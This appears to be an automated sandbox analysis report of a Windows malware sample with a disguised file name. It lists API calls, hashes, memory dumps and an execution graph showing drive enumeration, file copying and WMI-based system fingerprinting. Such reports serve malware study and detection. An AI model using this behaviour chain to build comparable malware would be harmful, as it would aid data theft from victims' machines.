                                                                                            • Instruction ID: 3d2cf85b630d662edb4f7820b33d0522d264e04407b7ab39e6dea751fb59ef0b
                                                                                            • Opcode Fuzzy Hash: dbacf9e9063e7b8cb696e162a0ac995eb619777845b30cb78a815c475f275a6e
                                                                                            • Instruction Fuzzy Hash: 0CF06271E056549BDA11DBB4E889D5A73FAAB047647721806F064D7F24C734F8C08BE4
                                                                                            APIs
                                                                                              • Part of subcall function 6CDD4F59: _free.LIBCMT ref: 6CDD4F67
                                                                                              • Part of subcall function 6CDD5B2D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CDD7BA3,?,00000000,00000000), ref: 6CDD5BD9
                                                                                            • GetLastError.KERNEL32 ref: 6CDD499F
                                                                                            • __dosmaperr.LIBCMT ref: 6CDD49A6
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CDD49E5
                                                                                            • __dosmaperr.LIBCMT ref: 6CDD49EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                            • String ID:
                                                                                            • API String ID: 167067550-0
                                                                                            • Opcode ID: 1dee3d67bbefa5939555e319271497f60fdcd39a4d768e071c342678b55bab4a
                                                                                            • Instruction ID: c9a6d27282eb2405ba1cb79170363b126fe97fdce21c434f66dcf85af717df80
                                                                                            • Opcode Fuzzy Hash: 1dee3d67bbefa5939555e319271497f60fdcd39a4d768e071c342678b55bab4a
                                                                                            • Instruction Fuzzy Hash: 19217471E04205BF9B109F668CC0D5AB7ACEF0536D7168658F968A7A60E731FC408BA4
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,?,6CDD8547,?,00000001,6CDD6956,?,6CDD8A01,00000001,?,?,?,6CDD68E5,?,00000000), ref: 6CDD423C
                                                                                            • _free.LIBCMT ref: 6CDD4299
                                                                                            • _free.LIBCMT ref: 6CDD42CF
                                                                                            • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CDD8A01,00000001,?,?,?,6CDD68E5,?,00000000,00000000,6CDE1360,0000002C,6CDD6956), ref: 6CDD42DA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_free
                                                                                            • String ID:
                                                                                            • API String ID: 2283115069-0
                                                                                            • Opcode ID: 3fef40d15c97e29d4acd9ab4116f5cc166ff817da17728d2ae5894adcb985830
                                                                                            • Instruction ID: 4076cff84704cef2b7037e1b98183cd9861a7e543db049c00de8346c7030b08e
                                                                                            • Opcode Fuzzy Hash: 3fef40d15c97e29d4acd9ab4116f5cc166ff817da17728d2ae5894adcb985830
                                                                                            • Instruction Fuzzy Hash: EB11A771F056106B9A0127B54C84E673AB9DBC237D72B0634F66597EB0EF24E8084361
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00000001,6CDD47C8,6CDD4859,?,?,6CDD3A6F), ref: 6CDD4393
                                                                                            • _free.LIBCMT ref: 6CDD43F0
                                                                                            • _free.LIBCMT ref: 6CDD4426
                                                                                            • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CDD47C8,6CDD4859,?,?,6CDD3A6F), ref: 6CDD4431
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_free
                                                                                            • String ID:
                                                                                            • API String ID: 2283115069-0
                                                                                            • Opcode ID: 3b3e10a94f68715d7796ccef4e82bf65a5bb57ad2c087d4d1803ec661cb39e18
                                                                                            • Instruction ID: ec08aabca8fa413696bfa5f9da4c4d1cbe9c01370b538a4f2a96ecfd1803c43b
                                                                                            • Opcode Fuzzy Hash: 3b3e10a94f68715d7796ccef4e82bf65a5bb57ad2c087d4d1803ec661cb39e18
                                                                                            • Instruction Fuzzy Hash: 5011C671F446106B9A0427BD9C84F6636F9DBC237D72B0638F56487AF0EF64AC094361
                                                                                            APIs
                                                                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CDD91F0,?,00000001,?,00000001,?,6CDD84D6,?,?,00000001), ref: 6CDD97AD
                                                                                            • GetLastError.KERNEL32(?,6CDD91F0,?,00000001,?,00000001,?,6CDD84D6,?,?,00000001,?,00000001,?,6CDD8A22,6CDD68E5), ref: 6CDD97B9
                                                                                              • Part of subcall function 6CDD977F: CloseHandle.KERNEL32(FFFFFFFE,6CDD97C9,?,6CDD91F0,?,00000001,?,00000001,?,6CDD84D6,?,?,00000001,?,00000001), ref: 6CDD978F
                                                                                            • ___initconout.LIBCMT ref: 6CDD97C9
                                                                                              • Part of subcall function 6CDD9741: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CDD9770,6CDD91DD,00000001,?,6CDD84D6,?,?,00000001,?), ref: 6CDD9754
                                                                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CDD91F0,?,00000001,?,00000001,?,6CDD84D6,?,?,00000001,?), ref: 6CDD97DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                            • String ID:
                                                                                            • API String ID: 2744216297-0
                                                                                            • Opcode ID: 3616d820e4f4d722ad1100a61a6ff2fa0987924d3975bc3bc142e952b0057021
                                                                                            • Instruction ID: 9b66df5ba2aead43be2d40465645810d11b7d0c66af319b95e93ff73216a2f80
                                                                                            • Opcode Fuzzy Hash: 3616d820e4f4d722ad1100a61a6ff2fa0987924d3975bc3bc142e952b0057021
                                                                                            • Instruction Fuzzy Hash: E4F0AC36A44125BBCF123FD6DC18E997F7AFB497A5F064110FB1995520CA72A820EB90
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 6CDD3B70
                                                                                              • Part of subcall function 6CDD4833: HeapFree.KERNEL32(00000000,00000000,?,6CDD3A6F), ref: 6CDD4849
                                                                                              • Part of subcall function 6CDD4833: GetLastError.KERNEL32(?,?,6CDD3A6F), ref: 6CDD485B
                                                                                            • _free.LIBCMT ref: 6CDD3B83
                                                                                            • _free.LIBCMT ref: 6CDD3B94
                                                                                            • _free.LIBCMT ref: 6CDD3BA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 38becc88903b89fb2c1d11af7dc807fca4bc8c844c83784317697ee9c17d15e5
                                                                                            • Instruction ID: a1ebf252de468529f7b3e264a14233b88a122b1916663c2b851eebc18966bfbd
                                                                                            • Opcode Fuzzy Hash: 38becc88903b89fb2c1d11af7dc807fca4bc8c844c83784317697ee9c17d15e5
                                                                                            • Instruction Fuzzy Hash: FBE0E6B1E203709ACE115F99E814A857F71EB5A7543024016E44492B34CF7D1596DFA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C:\Users\user\Desktop\S#U043eftWare.exe
                                                                                            • API String ID: 0-2954152740
                                                                                            • Opcode ID: 9d2ef95ee2aac55d73a1df15b9eea64bfcae9d8b868a97553c339bfcf4715d37
                                                                                            • Instruction ID: 85c9e0b297db57006eb6426b15df74953923ebbcb98e50f126b6e33c035575fd
                                                                                            • Opcode Fuzzy Hash: 9d2ef95ee2aac55d73a1df15b9eea64bfcae9d8b868a97553c339bfcf4715d37
                                                                                            • Instruction Fuzzy Hash: 64419571E14214EFDB11DF99CC80EAEBBF8EB89714F16006AE405D7760E774AA45CBA0
                                                                                            APIs
                                                                                              • Part of subcall function 6CDD5350: GetOEMCP.KERNEL32(00000000,6CDD55C1,?,00000001,6CDD8A01,6CDD8A01,00000001,?,?), ref: 6CDD537B
                                                                                            • _free.LIBCMT ref: 6CDD561E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID: `l
                                                                                            • API String ID: 269201875-379310572
                                                                                            • Opcode ID: 3a53755c3c082ceffa4bea67802ed97fd426ba4bab06cfd3717f81ca9fc20e95
                                                                                            • Instruction ID: 1ebd605f329a8d9481aed2c7ef8f57829c57d29b06d67b1b58ee0b3c9dfb1d1b
                                                                                            • Opcode Fuzzy Hash: 3a53755c3c082ceffa4bea67802ed97fd426ba4bab06cfd3717f81ca9fc20e95
                                                                                            • Instruction Fuzzy Hash: F7319EB2D00249AFCB01DFA9C840ADE77B5EF45318F16056AF9119B6A0FB31A955CFA0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: %y({$1i9k$1m1o$tu
                                                                                            • API String ID: 0-47764051
                                                                                            • Opcode ID: 6eacc2c23ea1e03beb1bb850e62ec4f2c02577823979bf7666b55ff15a0e00e9
                                                                                            • Instruction ID: b4783d29fbd02895d49f6e7c59753c85ef052303dd558781346f62f02471f553
                                                                                            • Opcode Fuzzy Hash: 6eacc2c23ea1e03beb1bb850e62ec4f2c02577823979bf7666b55ff15a0e00e9
                                                                                            • Instruction Fuzzy Hash: 084192B8D00258ABEB20EFB9DE467DD7E74BB81300F504299E4986B289D6750589CFD3

                                                                                            Execution Graph

                                                                                            Execution Coverage:12.5%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:17.4%
                                                                                            Total number of Nodes:493
                                                                                            Total number of Limit Nodes:32
                                                                                            execution_graph 8676 93d293 CoInitializeSecurity 9047 94c497 9048 96b630 LdrInitializeThunk 9047->9048 9049 94c4a3 9048->9049 9050 96b630 LdrInitializeThunk 9049->9050 9051 94c4bc 9050->9051 9051->9051 9052 948090 9053 96b100 3 API calls 9052->9053 9054 9480b8 9053->9054 9055 93ac95 9056 93acad 9055->9056 9059 93afe0 9056->9059 9061 93b020 9059->9061 9060 93acb6 9061->9060 9061->9061 9062 96b070 RtlFreeHeap 9061->9062 9062->9060 9258 955312 9259 955213 9258->9259 9260 954f60 9259->9260 9261 954fa0 9259->9261 9262 9709f0 3 API calls 9259->9262 9263 950970 3 API calls 9261->9263 9262->9259 9263->9260 9209 957f9d 9212 957f9c 9209->9212 9210 96ff30 LdrInitializeThunk 9210->9212 9211 958056 CopyFileW 9211->9212 9212->9209 9212->9210 9212->9211 9268 93df1d 9269 93df40 9268->9269 9271 93df8e 9269->9271 9272 96d920 LdrInitializeThunk 9269->9272 9272->9271 9136 951a05 9137 970280 LdrInitializeThunk 9136->9137 9138 951a22 9137->9138 9273 93a703 9274 93a716 9273->9274 9275 93afe0 RtlFreeHeap 9274->9275 9276 93a733 9275->9276 9139 952806 9140 952820 9139->9140 9140->9140 9141 9528a0 3 API calls 9140->9141 9142 95287c 9141->9142 9213 93d780 CoUninitialize CoUninitialize 9214 948980 9215 9489a0 9214->9215 9215->9215 9216 96ff30 LdrInitializeThunk 9215->9216 9218 948a95 9215->9218 9217 948bcd 9216->9217 9217->9218 9219 970280 LdrInitializeThunk 9217->9219 9219->9217 8718 93e085 8719 93e0a0 8718->8719 8722 93e0ee 8719->8722 8794 96d920 LdrInitializeThunk 8719->8794 8721 93e17e 8738 954470 8721->8738 8722->8721 8795 96d920 LdrInitializeThunk 8722->8795 8725 93e1c9 8751 954db0 8725->8751 8727 93e1e9 8757 955080 8727->8757 8729 93e209 8765 956910 8729->8765 8742 9544d0 8738->8742 8739 954654 8739->8725 8740 9547a1 8740->8739 8744 954905 8740->8744 8747 954a87 8740->8747 8807 9528a0 8740->8807 8742->8739 8742->8740 8742->8742 8743 9700e0 LdrInitializeThunk 8742->8743 8743->8740 8745 954a71 GetLogicalDrives 8744->8745 8746 9700e0 LdrInitializeThunk 8745->8746 8746->8747 8748 954bc1 GetLogicalDrives 8747->8748 8749 9700e0 LdrInitializeThunk 8748->8749 8750 954bd7 8749->8750 8753 954e60 8751->8753 8752 954fa0 8837 950970 8752->8837 8753->8752 8754 954f50 8753->8754 8843 9709f0 8753->8843 8754->8727 8758 955090 8757->8758 8855 970620 8758->8855 8760 954f60 8760->8729 8761 9709f0 3 API calls 8763 955206 8761->8763 8762 954fa0 8764 950970 3 API calls 8762->8764 8763->8760 8763->8761 8763->8762 8764->8760 8766 93e229 8765->8766 8772 956946 8765->8772 8774 957140 8766->8774 8767 9709f0 3 API calls 8767->8772 8769 970620 LdrInitializeThunk 8769->8772 8772->8766 8772->8767 8772->8769 8773 96d920 LdrInitializeThunk 8772->8773 8860 96d880 8772->8860 8869 970740 8772->8869 8879 970fb0 8772->8879 8773->8772 8775 957160 8774->8775 8776 95719e 8775->8776 8893 96d920 LdrInitializeThunk 8775->8893 8777 93e232 8776->8777 8778 96b030 RtlAllocateHeap 8776->8778 8784 957580 8777->8784 8781 957208 8778->8781 8780 96b070 RtlFreeHeap 8780->8777 8783 95725e 8781->8783 8894 96d920 LdrInitializeThunk 8781->8894 8783->8780 8783->8783 8895 9575a0 8784->8895 8794->8722 8795->8721 8822 96ff30 8807->8822 8809 9528e0 8815 953133 8809->8815 8826 96b030 8809->8826 8812 952939 8820 9529e1 8812->8820 8829 96d920 LdrInitializeThunk 8812->8829 8813 96b070 RtlFreeHeap 8817 95308d 8813->8817 8814 96b030 RtlAllocateHeap 8814->8820 8815->8744 8816 95307d 8816->8813 8817->8815 8835 96d920 LdrInitializeThunk 8817->8835 8820->8814 8820->8816 8830 96d920 LdrInitializeThunk 8820->8830 8831 96b070 8820->8831 8824 96ff50 8822->8824 8823 97008e 8823->8809 8824->8823 8836 96d920 LdrInitializeThunk 8824->8836 8827 96b040 8826->8827 8827->8827 8828 96b054 RtlAllocateHeap 8827->8828 8828->8812 8829->8812 8830->8820 8832 96b0f6 8831->8832 8833 96b088 RtlFreeHeap 8831->8833 8832->8820 8833->8832 8835->8817 8836->8823 8841 950980 8837->8841 8838 950a97 8838->8754 8839 9700e0 LdrInitializeThunk 8840 950aba 8839->8840 8840->8838 8842 9528a0 3 API calls 8840->8842 8841->8838 8841->8839 8841->8840 8842->8838 8846 970a20 8843->8846 8844 970a6e 8845 970cb4 8844->8845 8847 96b030 RtlAllocateHeap 8844->8847 8845->8753 8846->8844 8853 96d920 LdrInitializeThunk 8846->8853 8851 970aaf 8847->8851 8849 96b070 RtlFreeHeap 8849->8845 8850 970b1e 8850->8849 8851->8850 8854 96d920 LdrInitializeThunk 8851->8854 8853->8844 8854->8850 8856 970640 8855->8856 8856->8856 8857 97070f 8856->8857 8859 96d920 LdrInitializeThunk 8856->8859 8857->8763 8859->8857 8861 96d8f6 8860->8861 8862 96d901 8860->8862 8863 96d89c 8860->8863 8864 96d8aa RtlReAllocateHeap 8860->8864 8865 96b030 RtlAllocateHeap 8861->8865 8866 96b070 RtlFreeHeap 8862->8866 8863->8862 8863->8864 8868 96d8fc 8864->8868 8865->8868 8866->8868 8868->8772 8870 970760 8869->8870 8871 9707ae 8870->8871 8889 96d920 LdrInitializeThunk 8870->8889 8872 9709cd 8871->8872 8873 96b030 RtlAllocateHeap 8871->8873 8872->8772 8876 97082f 8873->8876 8875 96b070 RtlFreeHeap 8875->8872 8878 97089f 8876->8878 8890 96d920 LdrInitializeThunk 8876->8890 8878->8875 8880 970fbf 8879->8880 8881 97107e 8880->8881 8891 96d920 LdrInitializeThunk 8880->8891 8882 971275 8881->8882 8884 96b030 RtlAllocateHeap 8881->8884 8882->8772 8885 971124 8884->8885 8887 9711be 8885->8887 8892 96d920 LdrInitializeThunk 8885->8892 8886 96b070 RtlFreeHeap 8886->8882 8887->8886 8889->8871 8890->8878 8891->8881 8892->8887 8893->8776 8894->8783 8896 957610 8895->8896 8896->8896 8899 96b100 8896->8899 8900 96b130 8899->8900 8901 96b19e 8900->8901 8909 96d920 LdrInitializeThunk 8900->8909 8903 96b030 RtlAllocateHeap 8901->8903 8906 957683 8901->8906 8905 96b248 8903->8905 8904 96b070 RtlFreeHeap 8904->8906 8908 96b2ee 8905->8908 8910 96d920 LdrInitializeThunk 8905->8910 8908->8904 8909->8901 8910->8908 8938 96b100 8939 96b130 8938->8939 8940 96b19e 8939->8940 8948 96d920 LdrInitializeThunk 8939->8948 8942 96b030 RtlAllocateHeap 8940->8942 8945 96b420 8940->8945 8944 96b248 8942->8944 8943 96b070 RtlFreeHeap 8943->8945 8947 96b2ee 8944->8947 8949 96d920 LdrInitializeThunk 8944->8949 8947->8943 8948->8940 8949->8947 9220 96fd80 9221 96fda0 9220->9221 9222 96fece 9221->9222 9224 96d920 LdrInitializeThunk 9221->9224 9224->9222 9063 94b68e 9064 94b6c0 9063->9064 9065 96b450 LdrInitializeThunk 9064->9065 9071 94b77a 9065->9071 9066 96b700 LdrInitializeThunk 9066->9071 9067 96b030 RtlAllocateHeap 9067->9071 9068 96b630 LdrInitializeThunk 9068->9071 9069 94c066 9070 96b070 RtlFreeHeap 9070->9071 9071->9066 9071->9067 9071->9068 9071->9070 9071->9071 9073 96d920 LdrInitializeThunk 9071->9073 9075 94bbfe 9071->9075 9072 94c3f2 9072->9072 9073->9071 9074 9700e0 LdrInitializeThunk 9074->9075 9075->9069 9075->9074 9075->9075 9077 94bfef 9075->9077 9076 9700e0 LdrInitializeThunk 9076->9077 9077->9072 9077->9076 9225 93b989 9226 93b69f 9225->9226 9228 93b625 9225->9228 9227 96d880 3 API calls 9227->9228 9228->9226 9228->9227 9085 948c8a 9086 948c29 9085->9086 9086->9085 9087 970350 LdrInitializeThunk 9086->9087 9087->9086 8677 93e2b2 8678 93e2b8 8677->8678 8679 93e2c7 CoUninitialize 8678->8679 8680 93e300 8679->8680 9229 93d7b0 GetSystemDirectoryW 9230 93d7d7 9229->9230 9231 96b070 RtlFreeHeap 9230->9231 9232 93d80b 9231->9232 9143 93ca35 9144 96b070 RtlFreeHeap 9143->9144 9145 93ca3e 9144->9145 9088 9516bc 9090 9516f2 9088->9090 9089 951745 9090->9089 9092 96d920 LdrInitializeThunk 9090->9092 9092->9090 9146 93b626 9148 93b650 9146->9148 9147 96d880 3 API calls 9147->9148 9148->9147 9149 93b69f 9148->9149 9093 9576ab 9094 957720 9093->9094 9094->9094 9097 96bb30 9094->9097 9098 96bb90 9097->9098 9106 96bbfe 9098->9106 9107 96d920 LdrInitializeThunk 9098->9107 9099 95775e 9102 96c17b 9102->9099 9116 96d920 LdrInitializeThunk 9102->9116 9105 96d920 LdrInitializeThunk 9105->9106 9106->9099 9106->9102 9106->9105 9106->9106 9108 96b960 9106->9108 9112 96ba40 9106->9112 9107->9106 9109 96b990 9108->9109 9110 96b9fe 9109->9110 9117 96d920 LdrInitializeThunk 9109->9117 9110->9106 9114 96ba70 9112->9114 9113 96baee 9113->9106 9114->9113 9118 96d920 LdrInitializeThunk 9114->9118 9116->9099 9117->9110 9118->9113 9150 953450 9151 9537a6 9150->9151 9152 953462 9150->9152 9152->9151 9153 96ff30 LdrInitializeThunk 9152->9153 9154 9535ee 9153->9154 9155 969040 3 API calls 9154->9155 9158 95372a 9154->9158 9156 953707 9155->9156 9157 96ff30 LdrInitializeThunk 9156->9157 9156->9158 9157->9158 9158->9151 9159 970350 LdrInitializeThunk 9158->9159 9160 95375a 9159->9160 9160->9151 9162 96d920 LdrInitializeThunk 9160->9162 9162->9151 9233 94d3d1 9234 94d400 9233->9234 9235 96b070 RtlFreeHeap 9234->9235 9236 94d448 9235->9236 9236->9236 9281 955344 9282 955356 9281->9282 9283 970740 3 API calls 9282->9283 9284 955380 9283->9284 9285 970620 LdrInitializeThunk 9284->9285 9288 9553bd 9284->9288 9292 9553ae 9284->9292 9285->9292 9286 970620 LdrInitializeThunk 9286->9292 9289 955cc4 9306 96d920 LdrInitializeThunk 9289->9306 9291 9563ab 9292->9286 9292->9288 9292->9289 9292->9292 9293 95635f 9292->9293 9295 970cd0 9292->9295 9305 96d920 LdrInitializeThunk 9293->9305 9297 970cf0 9295->9297 9296 970d3e 9298 970f9b 9296->9298 9299 96b030 RtlAllocateHeap 9296->9299 9297->9296 9307 96d920 LdrInitializeThunk 9297->9307 9298->9292 9302 970d80 9299->9302 9301 96b070 RtlFreeHeap 9301->9298 9304 970def 9302->9304 9308 96d920 LdrInitializeThunk 9302->9308 9304->9301 9305->9289 9306->9291 9307->9296 9308->9304 9163 93d240 GetPixel 8912 93d2c5 8913 93d2f0 8912->8913 8916 9689d0 8913->8916 8915 93d34f 8918 968a40 CoCreateInstance 8916->8918 8919 968f56 8918->8919 8920 968b1a SysAllocString 8918->8920 8921 968f66 GetVolumeInformationW 8919->8921 8923 968bc7 8920->8923 8926 968f7d 8921->8926 8924 968f45 SysFreeString 8923->8924 8925 968bcf CoSetProxyBlanket 8923->8925 8924->8919 8927 968bef SysAllocString 8925->8927 8928 968f3b 8925->8928 8926->8915 8930 968ce0 8927->8930 8928->8924 8930->8930 8931 968d14 SysAllocString 8930->8931 8933 968d37 8931->8933 8932 968f25 SysFreeString SysFreeString 8932->8928 8933->8932 8934 968f14 8933->8934 8935 968d7b VariantInit 8933->8935 8934->8932 8937 968de0 8935->8937 8936 968f03 VariantClear 8936->8934 8937->8936 9127 9704c0 9128 9704f0 9127->9128 9128->9128 9130 97053e 9128->9130 9133 96d920 LdrInitializeThunk 9128->9133 9131 9705de 9130->9131 9134 96d920 LdrInitializeThunk 9130->9134 9133->9130 9134->9131 9309 94994e 9310 949970 9309->9310 9311 9499e7 9310->9311 9315 96d920 LdrInitializeThunk 9310->9315 9316 96d920 LdrInitializeThunk 9311->9316 9314 949aab 9315->9311 9316->9314 9164 93ea4f 9165 93ea70 9164->9165 9167 93eaaa 9165->9167 9170 96d920 LdrInitializeThunk 9165->9170 9169 93eb1a 9167->9169 9171 96d920 LdrInitializeThunk 9167->9171 9170->9167 9171->9169 9317 957774 9322 957791 9317->9322 9318 96ba40 LdrInitializeThunk 9318->9322 9319 96b630 LdrInitializeThunk 9320 957c3f 9319->9320 9321 957b59 9321->9319 9322->9318 9322->9321 9323 957e32 9322->9323 9324 952776 9325 9527a0 9324->9325 9325->9325 9326 9528a0 3 API calls 9325->9326 9327 9527cb 9326->9327 9328 9528a0 3 API calls 9327->9328 9329 9527ea 9328->9329 8686 952470 8687 95247e 8686->8687 8690 9524c0 8686->8690 8687->8687 8692 952580 8687->8692 8689 95253c 8689->8690 8691 950bb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 8689->8691 8691->8690 8693 952590 8692->8693 8693->8693 8696 9700e0 8693->8696 8695 9526af 8698 970100 8696->8698 8697 97022e 8697->8695 8698->8697 8700 96d920 LdrInitializeThunk 8698->8700 8700->8697 9237 9531f0 9238 953208 CoCreateInstance 9237->9238 9239 953223 9237->9239 9238->9239 9239->9239 8701 93dcff 8702 93dd90 8701->8702 8702->8702 8703 93ddde 8702->8703 8705 96d920 LdrInitializeThunk 8702->8705 8705->8703 9172 949c79 9173 949e20 9172->9173 9176 969290 9173->9176 9175 949f96 9177 970620 LdrInitializeThunk 9176->9177 9178 9692ac 9177->9178 9179 9709f0 3 API calls 9178->9179 9181 96937e 9178->9181 9180 9692d6 9179->9180 9182 970fb0 3 API calls 9180->9182 9183 969318 9180->9183 9181->9175 9182->9183 9183->9181 9185 96d920 LdrInitializeThunk 9183->9185 9185->9181 9240 93c7fd 9241 96d880 3 API calls 9240->9241 9242 93c80a 9241->9242 9186 94ac64 9187 94ac90 9186->9187 9189 94ace0 9187->9189 9200 96d920 LdrInitializeThunk 9187->9200 9191 94ad66 9189->9191 9201 96d920 LdrInitializeThunk 9189->9201 9193 94ade6 9191->9193 9202 96d920 LdrInitializeThunk 9191->9202 9195 94ae66 9193->9195 9203 96d920 LdrInitializeThunk 9193->9203 9196 96d920 LdrInitializeThunk 9195->9196 9198 94b123 9195->9198 9196->9195 9197 96b100 3 API calls 9197->9198 9198->9197 9199 96d920 LdrInitializeThunk 9198->9199 9199->9198 9200->9189 9201->9191 9202->9193 9203->9195 8706 938ae0 8707 938aef 8706->8707 8708 938af7 SHGetSpecialFolderPathW 8707->8708 8709 938d34 ExitProcess 8707->8709 8710 938b0d 8708->8710 8711 938b15 GetCurrentThreadId GetCurrentProcessId 8710->8711 8712 938d2a 8710->8712 8713 938b54 